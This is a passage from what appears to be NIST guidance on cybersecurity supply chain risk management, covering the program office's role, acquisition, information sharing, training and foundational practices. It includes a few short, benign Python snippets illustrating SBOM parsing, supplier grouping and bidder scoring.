that help set the tone for how C-SCRM is applied throughout the enterprise. The C-SCRM PMO
may provide SME support to guide Level 1 stakeholders through the risk framing process, which
includes establishing the enterprise appetite and tolerance for cybersecurity risks throughout the
supply chain. In addition, accountable risk executives may delegate the responsibility of drafting
the enterprise’s C-SCRM strategy and policy to the PMO. C-SCRM PMOs may also coordinate
C-SCRM information-sharing internally or with external entities. Finally, the PMO may conduct
C-SCRM-focused executive-level briefings (e.g., to the risk executive function, board of
directors) to help Level 1 stakeholders develop an aggregated view of cybersecurity risks
throughout the supply chain.
At Level 2, the C-SCRM PMO may develop C-SCRM starter kits that contain a base strategy
and a set of policies, procedures, and guidelines that can be further customized within specific
mission and business processes. This PMO may also provide SME consulting support to
stakeholders within mission and business processes as they create process-specific C-SCRM
strategies and develop C-SCRM implementation plans. As part of this responsibility, the C-
SCRM PMO may advise on or develop C-SCRM common control baselines within the enterprise
mission and business processes. The C-SCRM PMO may also perform C-SCRM risk
assessments focused on suppliers, developers, system integrators, external system service
providers, and other ICT/OT-related service providers of both technology- and non-technology-
related products and services.
The responsibilities of a C-SCRM PMO at Level 1 and Level 2 ultimately influence C-SCRM activities at Level 3 (Operational). A C-SCRM PMO may advise teams throughout the SDLC on C-SCRM control selection, tailoring, and monitoring. Ultimately, a C-SCRM PMO
may be responsible for activities that produce C-SCRM outputs across the risk management
levels. Centralizing C-SCRM services offers enterprises an opportunity to capitalize on
specialized skill sets within a consolidated team that offers high-quality C-SCRM services to the
rest of the enterprise. By centralizing risk assessment services, enterprises may achieve a level of
standardization not otherwise possible (e.g., in a decentralized model). Enterprises may also
realize cost efficiencies in cases where PMO resources are dedicated to C-SCRM activities
versus resources in decentralized models that may perform multiple roles in addition to C-SCRM
responsibilities.
A C-SCRM PMO model will typically favor larger, more complex enterprises that require the
standardization of C-SCRM practices across a disparate set of mission and business processes.
Ultimately, enterprises should select a C-SCRM operating model that is applicable and
appropriate relative to their available resources and context.
Key Takeaways24
Business Case for C-SCRM. C-SCRM provides enterprises with a number of benefits, such as
an understanding of critical systems, the reduced likelihood of supply chain compromise,
operational and enterprise efficiencies, fewer product quality and security issues, and more
reliable and trustworthy supplied services.
Cybersecurity Risk in Supply Chains. The potential for harm or compromise arising from a
relationship with suppliers, their supply chains, and their supplied products or services
materializes when a human or non-human threat successfully exploits a vulnerability tied to a
system, product, service, or the supply chain ecosystem.
Multilevel, Multidisciplinary C-SCRM. As described in [NIST SP 800-39], multilevel risk
management is the purposeful execution and continuous improvement of cybersecurity supply
chain risk management activities at the enterprise (e.g., CEO, COO), mission and business
process (e.g., business management, R&D), and operational (e.g., systems management) levels.
Each level contains stakeholders from multiple disciplines (e.g., information security,
procurement, enterprise risk management, engineering, software development, IT, legal, HR,
etc.) that collectively execute and continuously improve C-SCRM.
C-SCRM PMO. A dedicated office known as a C-SCRM PMO may support the enterprise’s C-
SCRM activities by providing support products (e.g., policy templates) and services (e.g., vendor
risk assessments) to the rest of the enterprise. A C-SCRM PMO may provide support across the
three levels and sit at Level 1 or Level 2, depending on the enterprise.
C-SCRM is a Life Cycle Process. C-SCRM activities should be integrated and executed
throughout the applicable enterprise life cycle processes (e.g., SDLC). For example, in systems,
cybersecurity supply chain risks can and do materialize during operations and maintenance
phases. Organizations should ensure that appropriate C-SCRM activities are in place to assess,
respond to, and monitor cybersecurity supply chain risks on a continuous basis.
24 Key takeaways describe key points from the section text. Refer to the Glossary in Appendix H for definitions.
3. CRITICAL SUCCESS FACTORS
To successfully address evolving cybersecurity risks throughout the supply chain, enterprises
need to engage multiple internal processes and capabilities, communicate and collaborate across
enterprise levels and mission areas, and ensure that all individuals within the enterprise
understand their role in managing cybersecurity risks throughout the supply chain. Enterprises
need strategies for communicating their supply chain cybersecurity controls and practices, determining how best to implement them, and monitoring their effectiveness. In addition to internally
communicating cybersecurity supply chain risk management controls, enterprises should engage
with peers to exchange C-SCRM insights. These insights will aid enterprises in continuously
evaluating how well they are doing, identifying where they need to improve, and taking steps to mature their C-SCRM program. This section addresses the requisite enterprise processes
and capabilities in making C-SCRM successful. While this publication has chosen to highlight
these critical success factors, this represents a non-exhaustive set of factors that contribute to an
enterprise’s successful execution of C-SCRM. Critical success factors are fluid and will evolve
over time as the environment and the enterprise’s own capability advance.
3.1. C-SCRM in Acquisition25
Integrating C-SCRM considerations into acquisition activities within every step of the
procurement and contract management life cycle process is essential to improving management
of cybersecurity risks throughout the supply chain. This life cycle begins with a purchaser
identifying a need and includes the processes to plan for and articulate requirements, conduct
research to identify and assess viable sources of supply, solicit bids, evaluate offers to ensure
conformance with C-SCRM requirements, and assess C-SCRM risks associated with the bidder
and the proposed product and/or service. After contract award, the enterprise should ensure that the supplier satisfies
the terms and conditions articulated in the contractual agreement and that the products and
services conform as expected and required. Monitoring for changes that may affect cybersecurity
risks in the supply chain should occur throughout the life cycle and may trigger reevaluation of
the original assessment or require a mitigation response.
Enterprises rely heavily on commercial products and outsourced services to perform operations
and fulfill their mission and business objectives. However, it is important to highlight that
products and services can also be obtained outside of the procurement process, as is the case with
open source software, relying on an in-house provider for shared services, or by repurposing an
existing product to satisfy a new need. C-SCRM must also be addressed for these other
“acquiring” processes.
In addition to addressing cybersecurity risks throughout the supply chain and performing C-
SCRM activities during each phase of the acquisition process, enterprises should develop and
execute an acquisition strategy that drives reductions in their overall risk exposure. By applying
such strategies, enterprises can reduce cybersecurity risks throughout the supply chain, within
specific procurement processes, and for the overall enterprise. Enterprises will aid, direct, and
25 Departments and agencies should refer to Appendix F to implement this guidance in accordance with Executive Order 14028, Improving the
Nation’s Cybersecurity.
inform efforts to realize targeted risk-reducing outcomes by adopting acquisition policies and
processes that integrate C-SCRM into acquisition activities.
Additionally, by adopting C-SCRM controls aligned to an industry-recognized set of standards
and guidelines (e.g., NIST 800-53, Rev.5; NIST CSF), the enterprise can ensure holistic
coverage of cybersecurity risks throughout the supply chain and corresponding C-SCRM
practices. C-SCRM controls may apply to different participants of the supply chain to include the
enterprise itself, prime contractors, and subcontractors. Because enterprises heavily rely on prime
contractors and their subcontractors to develop and implement ICT/OT products and services,
those controls implemented within the SDLC are likely to flow down to subcontractors.
Establishing C-SCRM controls applicable throughout the supply chain and the SDLC will aid the
enterprise in establishing a common lexicon and set of expectations with suppliers and sub-
suppliers to aid all participants in managing cybersecurity risks throughout the supply chain.
3.1.1. Acquisition in the C-SCRM Strategy and Implementation Plan
An enterprise’s C-SCRM Strategy and Implementation Plan guides the enterprise toward the
achievement of long-term, sustainable reductions in exposure to cybersecurity risks throughout
the supply chain. As a core part of the C-SCRM Strategy and Implementation Plan, enterprises
should address how this risk is managed throughout the acquisition process.
Cybersecurity risks in the supply chain include those arising from the supplier’s enterprise,
products, services, and the supplier’s own suppliers and supply chains. The C-SCRM PMO may
be helpful in developing specific strategies and implementation plans for integrating C-SCRM
considerations into acquisitions. Acquisition activities relevant to C-SCRM include:
• Promoting awareness and communicating C-SCRM expectations as part of supplier
relationship management efforts
• Establishing a checklist of acquisition security requirements that must be completed as
part of procurement requests to ensure that necessary provision and protections are in
place
• Leveraging an external shared service provider or utilizing the C-SCRM PMO to provide
supplier, product, and/or service assessment activities as a shared service to other internal
processes, including acquisition
• Conducting due diligence to inform determinations about a bidder’s responsibility and to
identify and assess bidders’ risk posture or risk associated with a given product or service
• Obtaining open source software from vetted and approved libraries
• Including C-SCRM criteria in source selection evaluations
• Establishing and referencing a list of prohibited suppliers, if appropriate, per applicable
regulatory and legal references
• Establishing and procuring from an approved products list or list of preferred or qualified
suppliers who have demonstrated conformance with the enterprise’s security
requirements through a rigorous process defined by the enterprise or another acceptable
qualified list program activity [CISA SCRM WG3]
• Ensuring that products, including software or logic-bearing products (i.e., hardware), are
supplied with a software bill of materials that complies with appropriate agency-approved
protocols
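For illustration of the software bill of materials item above, the sketch below walks a minimal SBOM-like document and lists component names and versions. The structure loosely resembles CycloneDX JSON but is simplified and hypothetical; real SBOM validation would check conformance to the agency-approved protocol.

```python
# Illustrative only: enumerate components from a minimal SBOM-like document.
# The shape loosely resembles CycloneDX JSON but is simplified/hypothetical.
import json

sbom_json = """
{
  "components": [
    {"name": "openssl", "version": "3.0.13"},
    {"name": "zlib", "version": "1.3.1"}
  ]
}
"""

sbom = json.loads(sbom_json)
for component in sbom.get("components", []):
    print(f"{component['name']} {component['version']}")
```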
The C-SCRM Strategy and Implementation Plan should address the acquisition security-relevant
foundational elements necessary to implement a C-SCRM program. To support the strategy,
enterprise leaders should promote the value and importance of C-SCRM within acquisitions and
ensure that sufficient, dedicated funding is in place for necessary activities. Doing so will help
enterprises ensure responsibility for program or business processes and accountability for
progress toward the attainment of results. Enterprises should build sufficient time into
acquisition and project activities to ensure that C-SCRM activities can be completed. Enterprises
should also assign roles and responsibilities, some of which will be cross-enterprise in nature and
team-based, while others will be specific to acquisition processes. Finally, relevant training
should be provided to members of the acquisition workforce to ensure that roles and
responsibilities are understood and executed in alignment with leader expectations.
The enterprise’s capabilities, resources, operational constraints, and existing portfolio of supplier
relationships, contracts, acquired services, and products provide the baseline context necessary to
lay out a strategic path that is both realistic and achievable. This baseline starting point also
serves as a marker by which performance progress and outcomes can be tracked and assessed.
A critical first step is to ensure that there is a current and accurate inventory of the enterprise’s
supplier relationships, contracts, and any products or services those suppliers provide. This
information allows for a mapping of these suppliers into strategically relevant groupings as
determined by the organization. For example, an assessment of these suppliers might result in
groupings of multiple categories (e.g., “strategic/innovative,” “mission-critical,” “sustaining,” or
“standard/non-essential”). This segmentation facilitates further analysis and understanding of the
exposure to cybersecurity risks throughout the supply chain and helps to focus attention and
assign priority to those critical suppliers of the most strategic or operational importance to the
enterprise and its mission and business processes. It is useful to identify which products and
services require a higher level of confidence in risk mitigation and areas of risk, such as
overreliance on a single source of supply. This inventory and mapping also facilitates the
selection and tailoring of C-SCRM contract language and evaluation criteria.
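A simple illustration of the supplier mapping described above: the sketch groups an inventory of suppliers into the example categories named in the text and reviews the most strategically important groups first. The supplier names and category field are hypothetical.

```python
# Hypothetical supplier segmentation using the example categories above.
from collections import defaultdict

suppliers = [
    {"name": "Supplier A", "category": "mission-critical"},
    {"name": "Supplier B", "category": "strategic/innovative"},
    {"name": "Supplier C", "category": "standard/non-essential"},
    {"name": "Supplier D", "category": "mission-critical"},
]

groups = defaultdict(list)
for supplier in suppliers:
    groups[supplier["category"]].append(supplier["name"])

# Focus attention on the most strategically important groups first.
for category in ("strategic/innovative", "mission-critical",
                 "sustaining", "standard/non-essential"):
    print(f"{category}: {groups.get(category, [])}")
```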
Additional information can be found in Appendix A of this document, [NISTIR 8179], and SA-1,
SA-2, SA-4, SR-5, SR-13 of NIST SP 800-53, Rev. 5.
3.1.2. The Role of C-SCRM in the Acquisition Process
When conducting a procurement, enterprises should designate experts from different subject
matter areas to participate in the acquisition process as members of the Acquisition Team and/or
Integrated Project Team.26 This includes program officials, personnel with technical and security
expertise, and representatives from supply and procurement communities. While procurement
requirements address and are tailored to a specific purpose and ensure that compliance
mandates are met, contextual factors such as mission criticality, the sensitivity of data, and the
26 An Integrated Project Team is equivalent to the acquisition team, as defined by the FAR.
operational environment must also be considered to effectively address cybersecurity risk in
supply chains.
This contextual basis sets the stage for the Acquisition Team to effectively gauge their tolerance
for risk as it pertains to a specific procurement requirement and determine which of the C-SCRM
controls described in this document and [NIST SP 800-53 Rev 5] are relevant and
necessary to consider for specific acquisitions. The program office or requiring official should
consult with information security personnel to complete this control selection process and work
with their procurement official to incorporate these controls into requirements documents and
contracts. Security is a critical factor in procurement decisions. For this reason, when purchasing
ICT/OT-related products or services, enterprises should avoid using a “lowest price, technically
acceptable” (LPTA) source selection process.
Acquisition policies and processes need to incorporate C-SCRM considerations into each step of
the procurement and contract management life cycle management process (i.e., plan
procurement, define and develop requirements, perform market analysis, complete procurement,
ensure compliance, and monitor performance for changes that affect C-SCRM risk status) as
described in [NISTIR 7622]. This includes ensuring that cybersecurity risks throughout the
supply chain are addressed when making ICT/OT-related charge card purchases.
During the ‘plan procurement’ step, the need for and the criticality of the good or service to be
procured need to be identified, along with a description of the factors driving the determination
of the need and level of criticality as this informs how much risk may be tolerated, who should
be involved in the planning, and the development of the specific requirements that will need to
be satisfied. This activity is typically led by the acquirer mission and business process owner or a
designee in collaboration with the procurement official or contracting officer representative.
During the planning phase, the enterprise should develop and define requirements to address
cybersecurity risks throughout the supply chain in addition to specifying performance, schedule,
and cost objectives. This process is typically initiated by the acquirer mission and business
process owner or a designee in collaboration with the procurement official and other members of
the C-SCRM team.
With requirements defined, enterprises will typically complete a market analysis for potential
suppliers. Market research and analysis activities explore the availability of potential or pre-
qualified sources of supply. This step is typically initiated by the acquirer mission and business
process owner or a designated representative. Enterprises should use this phase to conduct more
robust due diligence research on potential suppliers and/or products in order to generate a
supplier risk profile. As part of due diligence, the enterprise may consider the market
concentration for the sought-after product or service as a means of identifying interdependencies
within the supply chain. The enterprise may also use requests for information (RFIs), sources sought notices (SSNs), and/or due diligence questionnaires for the initial screening and collection
of evidence from potential suppliers. Enterprises should not treat the initial C-SCRM due
diligence risk assessment as exhaustive. Results of this research can also be helpful in shaping
the sourcing approach and refining requirements.
Finally, the enterprise will complete the procurement step by releasing a statement of work
(SOW), performance work statement (PWS), or statement of objective (SOO) for the release of a
request for proposal (RFP) or request for quotes (RFQ). Any bidders responding to the RFP or
RFQ should be evaluated against relevant, critical C-SCRM criteria. The RFP review process
should also include any procurement-specific supplier risk assessment. The assessment criteria
will be heavily informed by the defined C-SCRM requirements and include coverage of, but not be limited to, information about the enterprise, its security processes, and its security track
record. The response review process involves multiple C-SCRM stakeholders, including
procurement, the mission and business process owner, appropriate information system owners,
and technical experts. Prior to purchase, enterprises should identify and assess the quality of the product or system components, vulnerabilities, authenticity, and other relevant cybersecurity supply chain risk factors, and complete this risk assessment prior to deployment.
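Evaluating bidder responses against C-SCRM criteria can be pictured as a weighted scoring exercise. The criteria, weights, and scores below are entirely hypothetical; this sketches the idea rather than an evaluation method prescribed by this publication.

```python
# Hypothetical weighted scoring of bidders against C-SCRM evaluation criteria.
criteria_weights = {
    "security_processes": 0.40,
    "security_track_record": 0.35,
    "supply_chain_transparency": 0.25,
}

bidders = {
    "Bidder X": {"security_processes": 4, "security_track_record": 3,
                 "supply_chain_transparency": 5},
    "Bidder Y": {"security_processes": 3, "security_track_record": 4,
                 "supply_chain_transparency": 2},
}

for name, scores in bidders.items():
    total = sum(weight * scores[criterion]
                for criterion, weight in criteria_weights.items())
    print(f"{name}: weighted C-SCRM score = {total:.2f}")
```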
Once the contract is executed, the enterprise should monitor for changes that alter its exposure to
cybersecurity risks throughout the supply chain. Such changes may include internal enterprise or
system changes, supplier operational or structural changes, product updates, and geopolitical or
environmental changes. Contracts should include provisions that provide grounds for termination
in cases where there are changes to cybersecurity supply chain risk that cannot be adequately
mitigated to within acceptable levels. Finally, enterprises should continuously apply lessons
learned and collected during the acquisition process to enhance their ability to assess, respond to,
and monitor cybersecurity risks throughout the supply chain.
Table 3-1 shows a summary of where C-SCRM assessments may take place within the various
steps of the procurement process.
Table 3-1: C-SCRM in the Procurement Process

Plan Procurement
• Service Risk Assessment: criticality of needed service; other context (functions performed, access to systems/data, etc.); fit for purpose
• Supplier Risk Assessment: fit for purpose
• Product Risk Assessment: criticality of needed product; other context (operating environment, data, users, etc.); fit for purpose

Define or Develop Requirements
• Service Risk Assessment: identify relevant C-SCRM controls or requirements
• Supplier Risk Assessment: identify relevant C-SCRM controls or requirements
• Product Risk Assessment: identify relevant C-SCRM controls or requirements

Perform Market Analysis
• Service Risk Assessment: initial risk assessment (e.g., due diligence questionnaires)
• Supplier Risk Assessment: initial risk assessment (e.g., due diligence questionnaires)
• Product Risk Assessment: research product options and risk factors

Solicit Bids/Complete Procurement
• Service Risk Assessment: confirm C-SCRM requirements met; complete risk assessment
• Supplier Risk Assessment: confirm C-SCRM requirements met; complete risk assessment
• Product Risk Assessment: pre-deployment risk assessment

Operate and Maintain
• Service Risk Assessment: continuous risk monitoring
• Supplier Risk Assessment: continuous risk monitoring
• Product Risk Assessment: continuous risk monitoring
In addition to process activities, there are many useful acquisition security-enhancing tools and
techniques available, including obscuring the system end use or system component, using blind
or filtered buys, requiring tamper-evident packaging, or using trusted or controlled distribution.
The results of a supply chain cybersecurity risk assessment can guide and inform the strategies,
tools, and methods that are most applicable to the situation. Tools, techniques, and practices may
provide protections against unauthorized production, theft, tampering, insertion of counterfeits,
insertion of malicious software or backdoors, and poor development practices throughout the
system development life cycle.
To ensure the effective and continued management of cybersecurity risks across the supply chain
and throughout the acquisition life cycle, contractual agreements and contract management
should include:
• The satisfaction of applicable security requirements in contracts and mechanisms as a qualifying condition for award;
• Flow-down control requirements to subcontractors, if and when applicable, including C-SCRM performance objectives linked to the method of inspection in a Quality Assurance Surveillance Plan or equivalent method for monitoring performance;
• The periodic revalidation of supplier adherence to security requirements to ensure continual compliance;
• Processes and protocols for communication and the reporting of information about vulnerabilities, incidents, and other business disruptions, including acceptable deviations if the business disruption is deemed serious and baseline criteria to determine whether a disruption qualifies as serious; and
• Terms and conditions that address the government, supplier, and other applicable third-party roles, responsibilities, and actions for responding to identified supply chain risks or risk incidents in order to mitigate risk exposure, minimize harm, and support timely corrective action or recovery from an incident.
There are a variety of acceptable validation and revalidation methods, such as requisite
certifications, site visits, third-party assessments, or self-attestation. The type and rigor of the
required methods should be commensurate with the criticality of the service or product being
acquired and the corresponding assurance requirements.
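As a rough illustration of matching revalidation rigor to criticality, the sketch below maps hypothetical criticality tiers to the validation methods named above; the tiers and the mapping are assumptions.

```python
# Illustrative sketch only: selecting a revalidation method whose rigor is
# commensurate with the criticality of the acquired product or service.
# The criticality tiers and method mapping are hypothetical assumptions.

REVALIDATION_BY_CRITICALITY = {
    "high": "third-party assessment or site visit",
    "moderate": "requisite certification review",
    "low": "supplier self-attestation",
}

def revalidation_method(criticality: str) -> str:
    """Return the hypothetical revalidation method for a criticality tier."""
    return REVALIDATION_BY_CRITICALITY[criticality.lower()]

print(revalidation_method("High"))  # third-party assessment or site visit
```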
Additional guidance for integrating C-SCRM into the acquisition process is provided in
Appendix C, which demonstrates the enhanced overlay of C-SCRM into the [NIST SP 800-39]
Risk Management Process. In addition, enterprises should refer to and follow the acquisition and
procurement policies, regulations, and best practices that are specific to their domain (e.g.,
critical infrastructure sector, state government, etc.).
Additional information can be found in Appendix A of this document and SA-1, SA-2, SA-3, SA-4,
SA-9, SA-19, SA-20, SA-22, SR-5, SR-6, SR-10, and SR-11 of NIST SP 800-53, Rev. 5.
3.2. Supply Chain Information Sharing
Enterprises are continuously exposed to risk originating from their supply chains. An effective
information-sharing process helps to ensure that enterprises can gain access to information that is
critical to understanding and mitigating cybersecurity risks throughout the supply chain and also
share relevant information with others that may benefit from or require awareness of these risks.
To aid in identifying, assessing, monitoring, and responding to cybersecurity risks throughout the
supply chain, enterprises should build information-sharing processes and activities into their C-
SCRM programs. This may include establishing information-sharing agreements with peer
enterprises, business partners, and suppliers. By exchanging Supply Chain Risk Information
(SCRI) within a sharing community, enterprises can leverage the collective knowledge,
experience, and capabilities of that sharing community to gain a more complete understanding of
the threats that the enterprise may face. Additionally, the sharing of SCRI allows enterprises to
better detect campaigns that target specific industry sectors and institutions. However, the
enterprise should be sure that information sharing occurs through formal sharing structures, such
as Information Sharing and Analysis Centers (ISACs). Informal or unmanaged information
sharing can expose enterprises to potential legal risks.
Federal enterprises should establish processes to effectively engage with the FASC’s
information-sharing agency, which is responsible for facilitating information sharing among
government agencies and acting as a central, government-wide facilitator for C-SCRM
information-sharing activities.
NIST SP 800-150 describes key practices for establishing and participating in SCRI-sharing
relationships, including:
• Establish information-sharing goals and objectives that support business processes and
security policies
• Identify existing internal sources of SCRI
• Specify the scope of information-sharing activities27
• Establish information-sharing rules
• Join and participate in information-sharing efforts
• Actively seek to enrich indicators by providing additional context, corrections, or
suggested improvements
• Use secure, automated workflows to publish, consume, analyze, and act upon SCRI
• Proactively establish SCRI-sharing agreements
• Protect the security and privacy of sensitive information
• Provide ongoing support for information-sharing activities

27 The scope of information-sharing activities should include the data classification level that was approved at the most recent risk assessment for a supplier and the data types that were approved for that supplier. For example, if an assessment was performed for data at a certain classification level (e.g., Business Confidential) and the scope of the engagement changes to include data at a new classification level (e.g., Restricted), the risk assessment needs to be refreshed.
As shown in Table 3-2, below, SCRI describes or identifies the cybersecurity supply chain
relevant characteristics and risk factors associated with a product, service, or source of supply. It
may exist in various forms (e.g., raw data, a supply chain network map, risk assessment report,
etc.) and should be accompanied by the metadata that will facilitate an assessment of a level of
confidence in and credibility of the information. Enterprises should follow established processes
and procedures that describe whether and when the sharing or reporting of certain information is
mandated or voluntary and if there are any necessary requirements to adhere to regarding
information handling, protection, and classification.
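For illustration, an SCRI record and its accompanying metadata might be modeled as follows; the field names, handling marking, and example values are hypothetical assumptions rather than a prescribed schema.

```python
# Illustrative sketch only: a minimal Supply Chain Risk Information (SCRI)
# record carrying the metadata that supports confidence and credibility
# assessments. Field names and values are hypothetical assumptions.
from dataclasses import dataclass

@dataclass
class SCRIRecord:
    subject: str              # product, service, or source of supply
    form: str                 # e.g., "raw data", "supply chain map", "risk report"
    content: str
    source: str               # originating sharing partner or ISAC
    confidence: float         # assessed confidence in the information (0.0-1.0)
    credibility: float        # assessed credibility of the source (0.0-1.0)
    handling: str = "TLP:AMBER"     # hypothetical handling/classification marking
    sharing_mandated: bool = False  # mandatory vs. voluntary sharing

record = SCRIRecord(
    subject="Example Router Model X",
    form="risk assessment report",
    content="Counterfeit units observed in secondary market.",
    source="Sector ISAC",
    confidence=0.7,
    credibility=0.9,
)
print(record.subject, record.handling)
```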
Table 3-2: Supply Chain Characteristics and Cybersecurity Risk Factors Associated with a
Product, Service, or Source of Supply28

Source of Supply, Product, or Service Characteristics:
• Features and functionality
• Access to data and information, including system privileges
• Installation or operating environment
• Security, authenticity, and integrity of a given product or service and the associated supply and compilation chain
• The ability of the source to produce and deliver a product or service as expected
• Foreign control of or influence over the source (e.g., foreign ownership, personal and professional ties between the source and any foreign entity, legal regime of any foreign country in which the source is headquartered or conducts operations)29
• Market alternatives to the source
• Provenance and pedigree of components
• Supply chain relationships and locations

Risk Indicators, Analysis, and Findings:
• Threat information, including indicators (system artifacts or observables associated with an attack) and tactics, techniques, and procedures (TTPs)
• Security alerts or threat intelligence reports
• Implications to national security, homeland security, national critical infrastructure, or the processes associated with the use of the product or service
• Vulnerability of federal systems, programs, or facilities
• Threat level and vulnerability level assessment/score
• Potential impact or harm caused by the possible loss, damage, or compromise of a product, material, or service to an enterprise's operations or mission and the likelihood of a potential impact, harm, or the exploitability of a system
• The capacity to mitigate identified risks
• Potential risk factors, such as geopolitical, legal, managerial/internal controls, financial stability, cyber incidents, personal and physical security, or any other information that would factor into an analysis of the security, safety, integrity, resilience, reliability, quality, trustworthiness, or authenticity of a product, service, or source

28 The supply chain characteristics and cybersecurity risk factors associated with a product, service, or source of supply listed here are non-exhaustive.
29 The Special 301 Report, prepared annually by the Office of the United States Trade Representative (USTR), provides supplemental guidance for intellectual property handling (https://ustr.gov/issue-areas/intellectual-property/special-301).
3.3. C-SCRM Training and Awareness
Numerous individuals within the enterprise contribute to the success of C-SCRM. These may
include information security, procurement, risk management, engineering, software
development, IT, legal, HR, and program managers. Examples of these groups’ contributions
include:
• System Owners are responsible for multiple facets of C-SCRM at the operational level as
part of their responsibility for the development, procurement, integration, modification,
operation, maintenance, and/or final disposition of an information system.
• Human Resources defines and implements background checks and training policies,
which help ensure that individuals are trained in appropriate C-SCRM processes and
procedures.
• Legal helps draft or review C-SCRM-specific contractual language that is included by
procurement in contracts with suppliers, developers, system integrators, external system
service providers, and other ICT/OT-related service providers.
• Acquisition/procurement defines the process for implementing supplier assurance
practices embedded in the acquisition process.
• Engineering designs products and must understand existing requirements for the use of
open source components.
• Software developers ensure that software weaknesses and vulnerabilities are identified
and addressed as early as possible, including testing and fixing code.
• Shipping and receiving ensures that boxes containing critical components have not been
tampered with en route or at the warehouse.
• Project managers ensure that project plans are developed and include C-SCRM
considerations as part of the project plan and execution.
Everyone within an enterprise, including the end users of information systems, has a role in
managing cybersecurity risks throughout the supply chain. The enterprise should foster an
overall culture of security that includes C-SCRM as an integral part. The enterprise can use a
variety of communication methods to foster the culture, of which traditional awareness and role-
based training are only one component.
Every individual within an enterprise should receive appropriate training to enable them to
understand the importance of C-SCRM to their enterprise, their specific roles and
responsibilities, and the processes and procedures for reporting incidents. This
training can be integrated into the overall cybersecurity awareness training. Enterprises should
define baseline training requirements at a broad scope within Level 1, and those requirements
should be tailored and refined based on the specific context within Level 2 and Level 3.
Those individuals who have more significant roles in managing cybersecurity risks throughout
the supply chain should receive tailored C-SCRM training that helps them understand the scope
of their responsibilities, the specific processes and procedure implementations for which they are
responsible, and the actions to take in the event of an incident, disruption, or another C-SCRM-
related event. Enterprises should establish specific role-based training criteria and develop
role-specific C-SCRM training to address C-SCRM roles and responsibilities. The enterprise
may also consider adding C-SCRM content into preexisting role-based training for some specific
roles. Refer to the Awareness and Training controls in Section 4.5 for more detail.
Enterprises are encouraged to utilize the NIST National Initiative for Cybersecurity Education
(NICE) Framework30 as a means of forming a common lexicon for C-SCRM workforce topics.
This will aid enterprises in developing training linked to role-specific C-SCRM responsibilities
and communicating cybersecurity workforce-related topics. The NICE Framework outlines
Categories; Specialty Areas; Work Roles; Knowledge, Skills, and Abilities (KSAs); and Tasks
that describe cybersecurity work.
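A minimal sketch of role-based training assignment in the spirit of the NICE Framework appears below; the role names and module titles are hypothetical assumptions.

```python
# Illustrative sketch only: mapping enterprise roles to role-specific C-SCRM
# training content. Role names and module titles are hypothetical assumptions.

ROLE_TRAINING = {
    "procurement": ["C-SCRM contract clauses", "supplier due diligence"],
    "software_developer": ["secure development", "open source component vetting"],
    "shipping_receiving": ["tamper-evidence inspection"],
    "all_staff": ["C-SCRM awareness", "incident reporting procedures"],
}

def curriculum_for(role: str) -> list[str]:
    """Baseline awareness training plus any role-specific modules."""
    return ROLE_TRAINING["all_staff"] + ROLE_TRAINING.get(role, [])

print(curriculum_for("procurement"))
```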
3.4. C-SCRM Key Practices31
Cybersecurity supply chain risk management builds on existing standardized practices in
multiple disciplines and an ever-evolving set of C-SCRM capabilities. C-SCRM Key Practices
are meant to specifically emphasize and draw attention to a subset of the C-SCRM practices
described throughout this publication. Enterprises should prioritize achieving a base-level of
maturity in these key practices prior to advancing on to additional C-SCRM capabilities.
Enterprises should tailor their implementation of these practices to what is applicable and
appropriate given their unique context (e.g., based on available resources and risk profile). C-
SCRM Key Practices are described in NIST standards and guidelines, such as [NISTIR 8276],
and other applicable national and international standards. C-SCRM Practices include integrating
C-SCRM across the enterprise; establishing a formal program; knowing and managing critical
products, services, and suppliers; understanding an enterprise’s supply chain; closely
collaborating with critical suppliers; including critical suppliers in resilience and improvement
activities; assessing and monitoring throughout the supplier relationship; and planning for the
full life cycle.
30 See NIST SP 800-181, National Initiative for Cybersecurity Education (NICE) Cybersecurity Workforce Framework.
31 Departments and agencies should refer to Appendix F to implement this guidance in accordance with Executive Order 14028, Improving the
Nation’s Cybersecurity.
3.4.1. Foundational Practices
Having foundational practices in place is critical to successfully and productively interacting
with system integrators. Suppliers may be at varying levels with regard to having the
standardized practices in place. The following are specific examples of the recommended
multidisciplinary foundational practices that can be incrementally implemented to improve an
enterprise’s ability to develop and execute more advanced C-SCRM practices:
• Establish a core, dedicated, multidisciplinary C-SCRM Program Management Office
and/or C-SCRM team.
• Obtain senior leadership support for establishing and/or enhancing C-SCRM.
• Implement a risk management hierarchy and risk management process (in accordance
with NIST SP 800-39, Managing Information Security Risk [NIST SP 800-39]),
including an enterprise-wide risk assessment process (in accordance with NIST SP 800-
30, Rev. 1, Guide for Conducting Risk Assessments [NIST SP 800-30 Rev. 1]).
• Establish an enterprise governance structure that integrates C-SCRM requirements and
incorporates these requirements into the enterprise policies.
• Develop a process for identifying and measuring the criticality of the enterprise’s
suppliers, products, and services.
• Raise awareness and foster understanding of what C-SCRM is and why it is critically
important.
• Develop and/or integrate C-SCRM into acquisition/procurement policies and procedures
(including Federal Information Technology Acquisition Reform Act [FITARA]
processes, applicable to federal agencies) and purchase card processes. Supervisors and
managers should also ensure that their staff aims to build C-SCRM competencies.
• Establish consistent, well-documented, repeatable processes for determining Federal
Information Processing Standards (FIPS) 199 impact levels.
• Establish and begin using supplier risk-assessment processes on a prioritized basis
(inclusive of criticality analysis, threat analysis, and vulnerability analysis) after the
[FIPS 199] impact level has been defined.
• Implement a quality and reliability program that includes quality assurance and quality
control process and practices.
• Establish explicit collaborative and discipline-specific roles, accountabilities, structures,
and processes for supply chain, cybersecurity, product security, physical security, and
other relevant processes (e.g., Legal, Risk Executive, HR, Finance, Enterprise IT,
Program Management/System Engineering, Information Security,
Acquisition/Procurement, Supply Chain Logistics, etc.).
• Ensure that adequate resources are dedicated and allocated to information security and C-
SCRM to ensure proper implementation of policy, guidance, and controls.
• Ensure that there are sufficient cleared personnel in key C-SCRM roles and responsibilities to
access and share C-SCRM-related classified information.
• Implement an appropriate and tailored set of baseline information security controls found
in NIST SP 800-53, Revision 5, Security and Privacy Controls for Information Systems
and Organizations [NIST SP 800-53, Rev. 5].
• Establish internal checks and balances to ensure compliance with security and quality
requirements.
• Establish a supplier management program that includes, for example, guidelines for
purchasing from qualified original equipment manufacturers (OEMs)32 or their
authorized distributors and resellers.
• Implement a robust incident management program to successfully identify, respond to,
and mitigate security incidents. This program should be capable of identifying the root
cause of security incidents, including those that originate from the cybersecurity supply
chain.
• Establish internal processes to validate that suppliers and service providers actively
identify and disclose vulnerabilities in their products.
• Establish a governance capability for managing and monitoring components of embedded
software to manage risk across the enterprise (e.g., SBOMs paired with criticality,
vulnerability, threat, and exploitability to make this more automated).
